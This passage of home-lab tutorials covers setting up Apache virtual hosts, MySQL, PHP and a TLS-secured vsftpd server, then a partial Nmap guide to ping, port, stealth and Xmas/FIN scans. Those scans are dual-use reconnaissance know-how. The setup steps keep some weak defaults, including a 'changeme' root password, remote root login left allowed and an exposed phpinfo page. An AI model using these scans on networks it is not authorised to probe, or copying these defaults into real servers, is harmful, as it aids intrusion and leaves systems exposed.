990/tcp (v6)               ALLOW       Anywhere (v6)
Apache Full (v6)           ALLOW       Anywhere (v6)

toor@iphone:~$

2.3 Confirm that you can browse to the site

http://your_server_ip

Step 3: Create the Directory Structure

3.1 Virtual hosts enable us to run multiple websites on one server: each website can have its own home folder (“document root”) and its own SSL certificate, we can apply different security policies to each site, and much more.

Create the directory structure.

/var/www/
├── Domain-1.local
│ └── html
├── Domain-2.local
│ └── html

Before we create the directory for the site, make sure to configure hostname and hosts file.

I will create a website for my local lab domain ceh.local; the /etc/hosts file should have the following entry in it.

YOUR-IP-ADDRESS ceh.local

In this example I am creating a virtual host directory called “ceh.local”, using the -p flag to create the parent directories.

sudo mkdir -p /var/www/ceh.local/html

3.2 Assign ownership of the directory to current user

sudo chown -R $USER:$USER /var/www/ceh.local/html

3.3 Set directory permissions

sudo chmod -R 755 /var/www/ceh.local/html

3.4 Create a sample index.html file using your favorite editor and add it to the root directory.

sudo nano /var/www/ceh.local/html/index.html

Add the html code bellow

<!DOCTYPE html>
<html lang="en" dir="ltr">
  <head>
    <meta charset="utf-8">
    <title>Welcome to ceh.local</title>
  </head>
  <body>
    <h1>Success! ceh.local home page</h1>
  </body>
</html>

Exit & Save

Step 4: Configure Virtual Hosts File

Apache virtual host configuration files are stored in:

  • /etc/apache2/sites-enabled
  • /etc/apache2/sites-available

Let's add a virtual host configuration file for domain1.local

sudo nano /etc/apache2/sites-available/ceh.local.conf

Add the following lines and modify them to match your site.

<VirtualHost *:80>
    ServerName ceh.local
    ServerAlias www.ceh.local
    ServerAdmin admin@ceh.local
    DocumentRoot /var/www/ceh.local/html

    <Directory /var/www/ceh.local/html>
        Options -Indexes +FollowSymLinks
        AllowOverride All
    </Directory>

    ErrorLog ${APACHE_LOG_DIR}/ceh.local-error.log
    CustomLog ${APACHE_LOG_DIR}/ceh.local-access.log combined
</VirtualHost>

Exit & Save

4.2 Enable the virtual host configuration file with a2ensite

sudo a2ensite ceh.local.conf

Enabling site domain1.local.
To activate the new configuration, you need to run:
  systemctl reload apache2
toor@iphone:~$

4.3 Disable the default site defined in 000-default.conf

sudo a2dissite 000-default.conf

Site 000-default disabled.
To activate the new configuration, you need to run:
  systemctl reload apache2
toor@iphone:~$

4.4 Test the configuration file for any syntax errors

sudo apache2ctl configtest

Syntax OK
toor@iphone:/var/www/domain1.local/html$

4.5 Restart the Apache service for the changes to take effect

sudo systemctl restart apache2

4.6 Confirm that the service have started

sudo systemctl status apache2

4.7 Launch a web browser and browse to ceh.local
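Steps 3 and 4 are the same handful of operations for every site, so they lend themselves to a script with a verification pass. The following is an added example, not part of the original guide or of Apache: `provision_vhost` creates the document root with 755 permissions, a placeholder index.html and the virtual host file with the same directives as above, and `check_vhost` confirms the hardening points that matter (755 on the docroot, directory listings disabled, the expected DocumentRoot, per-site logs). Paths are parameters so it can be tried in a scratch directory; on a real server pass /var/www and /etc/apache2/sites-available, then enable and test the site with a2ensite and apache2ctl configtest as in 4.2 to 4.4. The function names are my own.

```shell
#!/bin/sh
# Added example: provision and verify one Apache virtual host (Steps 3 and 4).
# Directory parameters let it run in a scratch tree; the real values are
# /var/www and /etc/apache2/sites-available.

# provision_vhost DOMAIN WWW_ROOT SITES_AVAILABLE
provision_vhost() {
    domain=$1; www_root=$2; sites=$3
    docroot="$www_root/$domain/html"

    mkdir -p "$docroot" "$sites"
    chmod 755 "$www_root/$domain" "$docroot"     # readable by apache, writable by owner only

    cat > "$docroot/index.html" <<EOF
<!DOCTYPE html>
<html lang="en" dir="ltr">
  <head>
    <meta charset="utf-8">
    <title>Welcome to $domain</title>
  </head>
  <body>
    <h1>Success! $domain home page</h1>
  </body>
</html>
EOF

    # -Indexes: a missing index file must not turn into a directory listing
    cat > "$sites/$domain.conf" <<EOF
<VirtualHost *:80>
    ServerName $domain
    ServerAlias www.$domain
    ServerAdmin admin@$domain
    DocumentRoot $docroot

    <Directory $docroot>
        Options -Indexes +FollowSymLinks
        AllowOverride All
    </Directory>

    ErrorLog \${APACHE_LOG_DIR}/$domain-error.log
    CustomLog \${APACHE_LOG_DIR}/$domain-access.log combined
</VirtualHost>
EOF
}

# check_vhost DOMAIN WWW_ROOT SITES_AVAILABLE
# Returns 0 when the docroot is mode 755 and the vhost file disables indexes,
# points at that docroot and logs to per-site files; otherwise prints the
# first failed check and returns 1.
check_vhost() {
    domain=$1; www_root=$2; sites=$3
    docroot="$www_root/$domain/html"
    conf="$sites/$domain.conf"

    [ -f "$conf" ] || { echo "missing $conf"; return 1; }
    [ "$(stat -c %a "$docroot")" = "755" ] || { echo "docroot mode is not 755"; return 1; }
    grep -q "^ *DocumentRoot $docroot\$" "$conf" || { echo "DocumentRoot mismatch"; return 1; }
    grep -q '^ *Options .*-Indexes' "$conf" || { echo "directory listing not disabled"; return 1; }
    grep -q "^ *ErrorLog .*/$domain-error.log\$" "$conf" || { echo "no per-site error log"; return 1; }
    return 0
}
```

`check_vhost` is the part worth keeping around: run it after any manual edit to catch a docroot that drifted to 777 or a config where someone removed `-Indexes`.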

Step 5: Install MySQL

5.1 To install MySQL run

sudo apt install mysql-server -y

5.2 Verify that MySQL service is running

sudo systemctl status mysql

● mysql.service - MySQL Community Server
   Loaded: loaded (/lib/systemd/system/mysql.service; enabled; vendor preset: en
   Active: active (running) since Fri 2019-06-21 11:59:29 UTC; 8s ago
 Main PID: 17807 (mysqld)
    Tasks: 27 (limit: 2322)
   CGroup: /system.slice/mysql.service
           └─17807 /usr/sbin/mysqld --daemonize --pid-file=/run/mysqld/mysqld.pi

Jun 21 11:59:28 srv6 systemd[1]: Starting MySQL Community Server...
Jun 21 11:59:29 srv6 systemd[1]: Started MySQL Community Server.
toor@srv6:~$

5.3 The default MySQL user “root” has a blank password, so we need to secure the MySQL server and remove the default database.

sudo mysql_secure_installation

Then enter the following security questions

  • VALIDATE PASSWORD plugin = NO
  • Set root password and confirm
  • Remove anonymous users? = YES
  • Disallow root login remotely? = NO
  • Remove test database and access to it? = YES
  • Reload privilege tables now? = YES

5.4 Starting from MySQL Server 5.7, if you do not provide a password for the root user during the installation, it uses the auth_socket plugin for authentication.

If we want to configure a password authentication, we need to run the following commands.

sudo mysql

5.5 Display current configuration

SELECT user,authentication_string,plugin,host FROM mysql.user;

5.6 Alter authentication_string for the root user

ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY 'changeme';

5.7 Flush the privileges and update the changes

FLUSH PRIVILEGES;

5.8 Display current configuration

SELECT user,authentication_string,plugin,host FROM mysql.user;

5.9 Exit from the mysql prompt:

exit

Step 6: Install PHP

6.1 PHP is a server side scripting language used to generate dynamic content on websites and applications.

Install PHP (default version is PHP 7.2) and some of the basic modules for web deployments.

sudo apt install php php-common php-mysql php-gd php-cli -y

6.2 Create info.php file in the Apache root document folder.

Usually, the apache2 root document folder will be /var/www/html/ or /var/www/ in most Debian based Linux distributions.

If you have followed the guide then the file should be in /var/www/ceh.local/html/

sudo nano /var/www/ceh.local/html/info.php

Add the following lines

<?php
phpinfo();
?>

Exit and save

6.3 Restart Apache

sudo systemctl restart apache2

6.4 Test PHP page, open a web browser and enter “http://ceh.local/info.php”

Step 7: Install PhpMyAdmin

7.1 With phpMyAdmin we can administer MySQL from a web browser. Start by adding the needed repository.

sudo add-apt-repository universe

7.2 Install phpmyadmin

sudo apt install phpmyadmin -y

Go through the package installation process, select Apache2 and configure a password for the phpmyadmin database.

7.3 Restart Apache

sudo systemctl restart apache2

Conclusion

We have installed Apache2, MySQL, PHP and virtual hosts on an Ubuntu server and secured it.

For administration of the website we have installed phpmyadmin.




How To Install a FTP Server On Ubuntu Server 18.04

VsFTPD “Very Secure FTP Daemon”

VsFTPD (“very secure FTP daemon”) is an open source FTP server for Linux systems. In this quick guide we will install VsFTPD on an Ubuntu server and secure the FTP server with SSL/TLS. Please visit the official website of VsFTPD if you need more information about the application.

Requirements

  • Ubuntu Server 18.04
  • User with sudo privileges.
  • Static IP address
  • Configured firewall
  • Server connected to internet

For more information on how to create a sudo user and configure a static IP please see the quick guides Create Sudo User, Set Static IP address and Configure Ubuntu Firewall.

Install VsFTPD

Vsftpd is available in the Ubuntu 18.04 default repository and does not require any extra configuration beforehand.

Run the following command to install Vsftpd

sudo apt-get install vsftpd -y

Wait for the installation to finish, then start the Vsftpd service and enable it to start on boot.

sudo systemctl start vsftpd
sudo systemctl enable vsftpd

Verify that the VsFTPD is up and running.

sudo systemctl status vsftpd

root@iphone:~# sudo systemctl status vsftpd
● vsftpd.service - vsftpd FTP server
   Loaded: loaded (/lib/systemd/system/vsftpd.service; enabled; vendor preset: enabled)
   Active: active (running) since Sat 2019-06-08 18:17:39 UTC; 2min 54s ago
 Main PID: 2311 (vsftpd)
    Tasks: 1 (limit: 2214)
   CGroup: /system.slice/vsftpd.service

Jun 08 18:17:39 iphone systemd[1]: Starting vsftpd FTP server...
Jun 08 18:17:39 iphone systemd[1]: Started vsftpd FTP server.

Configure The Firewall

We need to open ports 20 and 21 for active FTP and ports 40000-50000 for passive FTP.

sudo ufw allow 20/tcp

sudo ufw allow 21/tcp

sudo ufw allow 40000:50000/tcp

Display the firewall rules.

sudo ufw status

root@iphone:~# sudo ufw status
Status: active

To                         Action      From
--                         ------      ----
22/tcp                     ALLOW       Anywhere
OpenSSH                    ALLOW       Anywhere
21/tcp                     ALLOW       Anywhere
40000:50000/tcp            ALLOW       Anywhere
22/tcp (v6)                ALLOW       Anywhere (v6)
OpenSSH (v6)               ALLOW       Anywhere (v6)
21/tcp (v6)                ALLOW       Anywhere (v6)
40000:50000/tcp (v6)       ALLOW       Anywhere (v6)

root@iphone:~#

Create FTP User

Create a low-privilege user that can be used to access the FTP server.

When prompted enter password and user information for the user.

sudo adduser ftpuser

root@iphone:~# sudo adduser ftpuser
Adding user `ftpuser' ...
Adding new group `ftpuser' (1001) ...
Adding new user `ftpuser' (1001) with group `ftpuser' ...
Creating home directory `/home/ftpuser' ...
Copying files from `/etc/skel' ...
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
Changing the user information for ftpuser
Enter the new value, or press ENTER for the default
        Full Name []:
        Room Number []:
        Work Phone []:
        Home Phone []:
        Other []:
Is the information correct? [Y/n] y
root@iphone:~#

Create a FTP Directory For The FTP User

First we want to create a FTP folder for the ftpuser.

sudo mkdir /home/ftpuser/ftp

Next we want to set the folder ownership.

sudo chown nobody:nogroup /home/ftpuser/ftp

Remove write permissions from the ftp folder.

sudo chmod a-w /home/ftpuser/ftp

Verify FTP folder permissions.

sudo ls -la /home/ftpuser/ftp

root@iphone:/home/ftpuser# sudo ls -la /home/ftpuser/ftp
total 8
dr-xr-xr-x 2 nobody  nogroup 4096 Jun  8 19:01 .
drwxr-xr-x 3 ftpuser ftpuser 4096 Jun  8 19:02 ..
root@iphone:/home/ftpuser#

Create a directory for file uploads and assign ownership to ftpuser.

sudo mkdir /home/ftpuser/ftp/files
sudo chown ftpuser:ftpuser /home/ftpuser/ftp/files

Verify the new folder permission.

sudo ls -la /home/ftpuser/ftp

root@iphone:/home/ftpuser/ftp/files# sudo ls -la /home/ftpuser/ftp
total 12
dr-xr-xr-x 3 nobody  nogroup 4096 Jun  8 19:08 .
drwxr-xr-x 3 ftpuser ftpuser 4096 Jun  8 19:02 ..
drwxr-xr-x 2 ftpuser ftpuser 4096 Jun  8 19:08 files
root@iphone:/home/ftpuser/ftp/files#

Create a txt file in the files folder we created in the step above.

echo "Test create txt file" | sudo tee /home/ftpuser/ftp/files/txt01.txt

Configuring VsFTPD

Edit the VsFTPD configuration file vsftpd.conf

cd /etc/
sudo nano vsftpd.conf

##
# Allow anonymous FTP? (Disabled by default).
anonymous_enable=NO
#
# Uncomment this to allow local users to log in.
local_enable=YES
##

Enable uploading to the FTP server by uncommenting the write_enable parameter.

##
write_enable=YES
##

Prevent the FTP users from accessing files or running commands outside their directory by uncommenting the chroot_local_user=YES parameter.

##
chroot_local_user=YES
##

Scroll down to the bottom and add the port range for passive FTP.

pasv_min_port=40000
pasv_max_port=50000

Previously we created the ftp and ftp/files directories for ftpuser; now we need to configure VsFTPD to place ftpuser in the ftp directory we created when the user logs in.

Add the lines below.

user_sub_token=$USER
local_root=/home/$USER/ftp

Restart the daemon.

sudo systemctl restart vsftpd

Testing The FTP Access

You can use an FTP client like FileZilla or the command line to confirm that you can access the FTP server and that you can see the txt file you created in the ftpuser ftp directory.

I am using the command line on the FTP server in this example to confirm that I can access the FTP server and download txt01.txt.

root@iphone:/# ftp 127.0.0.1
Connected to 127.0.0.1.
220 (vsFTPd 3.0.3)
Name (127.0.0.1:toor): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

Let's confirm that we can change to the “files” directory.

ls
cd files

ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 1001     1001         4096 Jun 08 19:17 files
226 Directory send OK.
ftp> cd files
250 Directory successfully changed.
ftp>

List the directory and use the get command to transfer the test file.

ls
get txt01.txt

ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0              21 Jun 08 19:16 txt01.txt
226 Directory send OK.
ftp> get txt01.txt
local: txt01.txt remote: txt01.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for txt01.txt (21 bytes).
226 Transfer complete.
21 bytes received in 0.00 secs (259.5926 kB/s)
ftp>

Upload the file with a new name to test the user's write permissions. To upload a file we use the put command.

put txt01.txt txt01-upload.txt

ftp> put txt01.txt txt01-upload.txt
local: txt01.txt remote: txt01-upload.txt
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
21 bytes sent in 0.00 secs (1.0541 MB/s)
ftp>

Listing the files directory should show two files now.

ls

ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-------    1 1001     1001           21 Jun 08 21:00 txt01-upload.txt
-rw-r--r--    1 0        0              21 Jun 08 19:16 txt01.txt
226 Directory send OK.
ftp>

(Optional) Secure The FTP Server With TLS

Let's start by adding the firewall rule for TLS traffic: add port 990 to the firewall access list.

sudo ufw allow 990/tcp

root@iphone:/# sudo ufw allow 990/tcp
Rule added
Rule added (v6)
root@iphone:/#

Confirm firewall status

sudo ufw status

root@iphone:/# sudo ufw status
Status: active

To                         Action      From
--                         ------      ----
22/tcp                     ALLOW       Anywhere
OpenSSH                    ALLOW       Anywhere
21/tcp                     ALLOW       Anywhere
40000:50000/tcp            ALLOW       Anywhere
990/tcp                    ALLOW       Anywhere
22/tcp (v6)                ALLOW       Anywhere (v6)
OpenSSH (v6)               ALLOW       Anywhere (v6)
21/tcp (v6)                ALLOW       Anywhere (v6)
40000:50000/tcp (v6)       ALLOW       Anywhere (v6)
990/tcp (v6)               ALLOW       Anywhere (v6)

root@iphone:/#

Create an OpenSSL certificate

Create an OpenSSL certificate for TLS/SSL encryption. First make a directory where you can save the certificate.

sudo mkdir /etc/ftpcert

Now we will create a new certificate. Use the -days flag to make it valid for two years, 730 days. Next set the bit size of the RSA key; I am using a 2048-bit RSA key.

The -keyout and -out flags set where the private key and the certificate are written.

NOTE: Setting both flags with the same value will create both the private key and the certificate in the same file.

You will be asked to enter details like country, state, etc. You don’t have to fill in the information. Just keep pressing ENTER for defaults.

sudo openssl req -x509 -nodes -days 730 -newkey rsa:2048 -keyout /etc/ftpcert/vsftpd.pem -out /etc/ftpcert/vsftpd.pem

Confirm that the private key and the certificate are in the ftpcert directory.

root@iphone:/# cd /etc/ftpcert/
root@iphone:/etc/ftpcert# ls
vsftpd.pem
root@iphone:/etc/ftpcert#

Next we need to configure vsftpd to allow TLS/SSL traffic and point it at the private key and the certificate. Open the vsftpd configuration file with an editor.

cd /etc/
sudo nano vsftpd.conf

Scroll down until you find the rsa parameters, comment them out and add new lines that point at the private key and the certificate we created.

##
# rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem
# rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key
##

rsa_cert_file=/etc/ftpcert/vsftpd.pem
rsa_private_key_file=/etc/ftpcert/vsftpd.pem

Configure FTP connections to use SSL/TLS: change the ssl_enable=NO parameter to YES.

##
ssl_enable=YES
##

Now add the following lines to deny anonymous connections over SSL and to require SSL for logins and data transfers.

##
allow_anon_ssl=NO
force_local_data_ssl=YES
force_local_logins_ssl=YES
##

Configure the server to use the TLS protocol and disable SSLv2 and SSLv3.

##
ssl_tlsv1=YES
ssl_sslv2=NO
ssl_sslv3=NO
##

Last, set the SSL reuse parameter to NO, since it can cause conflicts with FTP clients. Then we need to use a high-encryption cipher suite, which means key lengths equal to or greater than 128 bits.

Paste the lines below.

##
require_ssl_reuse=NO
ssl_ciphers=HIGH
##

The configuration should now have the entries below.

#
rsa_cert_file=/etc/ftpcert/vsftpd.pem
rsa_private_key_file=/etc/ftpcert/vsftpd.pem
#
#
ssl_enable=YES
#
allow_anon_ssl=NO
force_local_data_ssl=YES
force_local_logins_ssl=YES
##
ssl_tlsv1=YES
ssl_sslv2=NO
ssl_sslv3=NO
#
require_ssl_reuse=NO
ssl_ciphers=HIGH
#
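As an added check (example code, not part of vsftpd or this guide), the script below parses a vsftpd.conf the way vsftpd reads it and reports every TLS setting that is missing or weaker than the values above; the stock-Ubuntu excerpt it audits is constructed for the example.

```python
"""Audit a vsftpd.conf for the TLS settings described above."""
from __future__ import annotations

# Values from this guide; the certificate paths are the ones created under
# /etc/ftpcert. The Ubuntu default config points at the snakeoil certificate
# and has ssl_enable=NO.
HARDENED = {
    "ssl_enable": "YES",
    "allow_anon_ssl": "NO",
    "force_local_data_ssl": "YES",
    "force_local_logins_ssl": "YES",
    "ssl_tlsv1": "YES",
    "ssl_sslv2": "NO",
    "ssl_sslv3": "NO",
    "require_ssl_reuse": "NO",
    "ssl_ciphers": "HIGH",
}
CERT_KEYS = ("rsa_cert_file", "rsa_private_key_file")


def parse_vsftpd_conf(text: str) -> tuple[dict[str, str], list[str]]:
    """Return (settings, malformed). Blank lines and '#' comments are
    skipped and the last assignment of a key wins. vsftpd rejects whitespace
    around '=', so such lines are reported in `malformed` as well."""
    settings: dict[str, str] = {}
    malformed: list[str] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, sep, value = line.partition("=")
        if not sep:
            malformed.append(line)          # no '=': vsftpd refuses to start
            continue
        if key != key.strip() or value != value.strip():
            malformed.append(line)
        settings[key.strip()] = value.strip()
    return settings, malformed


def audit_tls(settings: dict[str, str]) -> list[str]:
    """List every TLS setting that is missing or weaker than the guide's value;
    an empty list means the configuration matches."""
    findings: list[str] = []
    for key, want in HARDENED.items():
        got = settings.get(key)
        if got is None:
            findings.append(f"{key} is not set (want {want})")
        elif got.upper() != want:
            findings.append(f"{key}={got} (want {want})")
    for key in CERT_KEYS:
        path = settings.get(key)
        if not path:
            findings.append(f"{key} is not set")
        elif "snakeoil" in path:
            findings.append(f"{key} still points at the default snakeoil certificate")
    return findings


# Constructed excerpt of the stock Ubuntu vsftpd.conf (before the changes above)
DEFAULT_CONF = """\
listen=NO
listen_ipv6=YES
anonymous_enable=NO
local_enable=YES
rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem
rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key
ssl_enable=NO
"""

# The entries this guide ends up with
HARDENED_CONF = """\
rsa_cert_file=/etc/ftpcert/vsftpd.pem
rsa_private_key_file=/etc/ftpcert/vsftpd.pem
ssl_enable=YES
allow_anon_ssl=NO
force_local_data_ssl=YES
force_local_logins_ssl=YES
ssl_tlsv1=YES
ssl_sslv2=NO
ssl_sslv3=NO
require_ssl_reuse=NO
ssl_ciphers=HIGH
"""

if __name__ == "__main__":
    for name, conf in (("default", DEFAULT_CONF), ("hardened", HARDENED_CONF)):
        settings, malformed = parse_vsftpd_conf(conf)
        print(name, audit_tls(settings) or ["OK"], malformed)
```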

Restart vsftpd to load the new configuration.

sudo systemctl restart vsftpd

Confirm FTP TLS Configuration

Download an FTP client like FileZilla; you can grab the FileZilla client from the official site https://filezilla-project.org/

Install and run the FTP client. When connecting to the FTP server use "Require explicit FTP over TLS". If everything is configured correctly you should be greeted with a pop-up window that displays the server certificate we created.

If you try to connect to the FTP server with plain FTP, you will get an error and you won't be able to connect to the server.

Status:	Connection established, waiting for welcome message...
Response:	220 (vsFTPd 3.0.3)
Command:	USER ftpuser
Response:	530 Non-anonymous sessions must use encryption.
Error:	Could not connect to server

Conclusion

In this quick guide we have installed an FTP server on Ubuntu 18.04.02, generated a certificate with OpenSSL and secured the server connectivity with TLS.




How To Scan a Network With Nmap

How To Scan With Nmap

Nmap is a great tool to learn. The application has the ability to scan and map networks and much more; it is a great tool for everybody who works in IT.

It is the first tool I use when I want to troubleshoot: we can do a regular ping or ping sweeps that scan a range of the subnet or the whole subnet.

The application also offers host discovery, port discovery, operating system and version discovery, MAC addresses, services, and exploit and vulnerability detection.

Another great tool to use while learning nmap is Wireshark. It is highly recommended to run Wireshark while using nmap; following the flow of network traffic will help you analyse and visualise the scans.

We will try some of the popular scanning methods that can be used with nmap.

This guide is only meant to give you a high-level understanding of how to use the different scanning techniques.

Please don't scan networks or hosts you are not authorized to scan. The networks and hosts scanned in this guide are my home lab.

If you want a more in-depth explanation of how to use nmap and its switches, I recommend that you read "The Official Nmap Project Guide to Network Discovery and Security Scanning".

Save Output To Txt/Xml File

Description            Command                        Example
Save output to file    nmap -oN [file.txt] [Target]   nmap -oN file.txt 192.168.100.11
Save output as XML     nmap -oX [file.xml] [Target]   nmap -oX file.xml 192.168.100.11
Save in all formats    nmap -oA [file] [Target]       nmap -oA file 192.168.100.11

Basic Scanning

Description                    Command                     Example
Scan a single host             nmap [Target]               nmap 192.168.100.100
Scan multiple targets          nmap [Target1] [Target2]    nmap 192.168.100.10 192.168.100.100
Scan a range of IP addresses   nmap [IP Range]             nmap 192.168.100.10-99
Scan a Class C subnet          nmap [IP/CIDR]              nmap 192.168.100.0/24
Resolve FQDN                   nmap [FQDN]                 nmap www.example.com

Quick Scans

Description                         Command             Example
Ping scan                           nmap -sP [Target]   nmap -sP 192.168.100.11
Ping scan, disable port scanning    nmap -sn [Target]   nmap -sn 192.168.100.0/24

The -sP switch can be used when you want to make a quick ping; the host or hosts will reply to ICMP ping packets.

nmap -sP 192.168.100.11

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-26 21:05 W. Europe Daylight Time
Nmap scan report for 192.168.100.11
Host is up (0.0010s latency).
Nmap done: 1 IP address (1 host up) scanned in 5.84 seconds

The -sn switch is used to sweep a network without doing any port scans.

nmap -sn 192.168.100.0/24

Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-02 00:02 W. Europe Daylight Time
Nmap scan report for 192.168.100.1
Host is up (0.0010s latency).
Nmap scan report for srv1.online-it.nu (192.168.100.11)
Host is up (0.0020s latency).
Nmap scan report for 192.168.100.13
Host is up (0.0010s latency).
Nmap scan report for srv7.home.local (192.168.100.17)
Host is up (0.0011s latency).
Nmap scan report for 192.168.100.100
Host is up (0.0013s latency).
Nmap done: 256 IP addresses (5 hosts up) scanned in 10.82 seconds

Banner Grabbing & Service Detection

Description             Command             Example
Detect OS               nmap -O [Target]    nmap -O 192.168.100.11
Detect OS & services    nmap -A [Target]    nmap -A 192.168.100.11
Detect services         nmap -sV [Target]   nmap -sV 192.168.100.11

The -O switch scans for operating system details. This type of scan can be used to identify the operating system of the scanned host and the services the host is running.

nmap -O 192.168.100.11

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-26 21:12 W. Europe Daylight Time
Nmap scan report for 192.168.100.11
Host is up (0.00032s latency).
Not shown: 988 closed ports
PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
3389/tcp open  ms-wbt-server
Device type: general purpose
Running: Microsoft Windows 2016
OS CPE: cpe:/o:microsoft:windows_server_2016
OS details: Microsoft Windows Server 2016 build 10586 - 14393
Network Distance: 2 hops

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.96 seconds

Port Scans Types

Description                          Command                        Example
Scan a single port                   nmap -p [Port] [Target]        nmap -p 80 192.168.100.11
Scan a range of ports                nmap -p [Port-Port] [Target]   nmap -p 20-99 192.168.100.11
Fast scan (100 most common ports)    nmap -F [Target]               nmap -F 192.168.100.11
Scan using TCP handshake             nmap -sT [Target]              nmap -sT 192.168.100.11
Scan using TCP SYN (stealth)         nmap -sS [Target]              nmap -sS 192.168.100.11
Scan UDP ports                       nmap -sU [Target]              nmap -sU 192.168.100.11

The -sT switch performs a full TCP handshake with the target. This is considered more accurate than a SYN scan, but it is slower and can be easily detected by firewalls and IDS.

nmap -sT 192.168.100.11

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-26 21:18 W. Europe Daylight Time

Nmap scan report for 192.168.100.11
Host is up (1.0s latency).
Not shown: 986 closed ports
PORT     STATE    SERVICE
25/tcp   filtered smtp
53/tcp   open     domain
88/tcp   open     kerberos-sec
110/tcp  filtered pop3
135/tcp  open     msrpc
139/tcp  open     netbios-ssn
389/tcp  open     ldap
445/tcp  open     microsoft-ds
464/tcp  open     kpasswd5
593/tcp  open     http-rpc-epmap
636/tcp  open     ldapssl
3268/tcp open     globalcatLDAP
3269/tcp open     globalcatLDAPssl
3389/tcp open     ms-wbt-server

Nmap done: 1 IP address (1 host up) scanned in 219.83 seconds

Analysing the scan in Wireshark we can see that the open port responds to the handshake.

If the port is closed on the host, the target host responds with an RST+ACK packet.

The -sS switch sends only a TCP SYN packet and waits for a SYN+ACK. If it receives a SYN+ACK on the probed port it responds with an RST packet instead of completing the handshake; in this way the scan can go undetected by the firewall. If the scanned port is closed on the target host, the target only responds with an RST packet.

nmap -sS 192.168.100.11

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-26 21:24 W. Europe Daylight Time
Nmap scan report for 192.168.100.11

Host is up (0.0013s latency).
Not shown: 988 closed ports
PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
3389/tcp open  ms-wbt-server

Nmap done: 1 IP address (1 host up) scanned in 6.31 seconds

Analysing the packets in Wireshark we can see that we first send a SYN packet to the scanned port on the target host; if the port is open the target responds with a SYN+ACK packet and we respond with an RST packet.

If the port is closed on the scanned target we get an RST+ACK back.

The -sU switch scans UDP ports. UDP is a connectionless protocol: UDP packets do not have an ACK flag, and the protocol does not require the receiver to confirm that it received a UDP packet.

If there is a firewall enabled on the host or on the network, the output will report ports as "open|filtered", a list of ports that are blocked by the firewall.

nmap -sU 192.168.100.11

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-30 19:58 W. Europe Daylight Time

Nmap scan report for 192.168.100.11
Host is up (0.0016s latency).
Not shown: 997 open|filtered ports
PORT    STATE SERVICE
53/udp  open  domain
123/udp open  ntp
389/udp open  ldap

Nmap done: 1 IP address (1 host up) scanned in 17.27 seconds

If the firewall is disabled there will be no "open|filtered" response.

Inverse Scans

Description      Command             Example
Xmas scan        nmap -sX [Target]   nmap -sX 192.168.100.11
FIN scan         nmap -sF [Target]   nmap -sF 192.168.100.11
TCP NULL scan    nmap -sN [Target]   nmap -sN 192.168.100.11
ACK scan         nmap -sA [Target]   nmap -sA 192.168.100.11

The -sX switch is called an Xmas scan. When you scan a network or a target host with an Xmas scan, it sends a packet that contains multiple flags: the URG, PSH and FIN flags. If a port is closed, the host responds with a single RST packet; an open port gives no response, so it is reported as open|filtered. Modern operating systems, firewalls and IDS drop this kind of packet if they are properly configured.

We will run the Xmas scan against a Windows server with the firewall enabled.

nmap -sX 192.168.100.11

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-30 17:07 W. Europe Daylight Time
Nmap scan report for 192.168.100.11
Host is up (0.0010s latency).
All 1000 scanned ports on 192.168.100.11 are open|filtered

Nmap done: 1 IP address (1 host up) scanned in 27.62 seconds

Observe the line "All 1000 scanned ports on 192.168.100.11 are open|filtered": the output shows that all scanned ports are "open|filtered". This means that the firewall is enabled on the target host.

Let's try the same scan, but this time we will disable the firewall on our target host.

nmap -sX 192.168.100.11

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-30 17:13 W. Europe Daylight Time
Nmap scan report for 192.168.100.11
Host is up (0.0012s latency).
All 1000 scanned ports on 192.168.100.11 are closed

Nmap done: 1 IP address (1 host up) scanned in 6.78 seconds

Now we get "All 1000 scanned ports on 192.168.100.11 are closed", which indicates that the firewall is disabled.

The -sF switch scans the host with a FIN scan. A FIN scan sends a packet with only the FIN flag set, which can allow the packet to pass the firewall. If the port is open you will not get any response; if the port is closed the target responds with an RST packet.

When the firewall is enabled on the target the output will show an "open|filtered" response.

nmap -sF 192.168.100.11

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-30 17:51 W. Europe Daylight Time
Nmap scan report for 192.168.100.11
Host is up (0.0010s latency).
All 1000 scanned ports on 192.168.100.11 are open|filtered

Nmap done: 1 IP address (1 host up) scanned in 27.19 seconds

If the firewall is disabled on the target the output will show a "closed" response.

nmap -sF 192.168.100.11

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-30 18:06 W. Europe Daylight Time
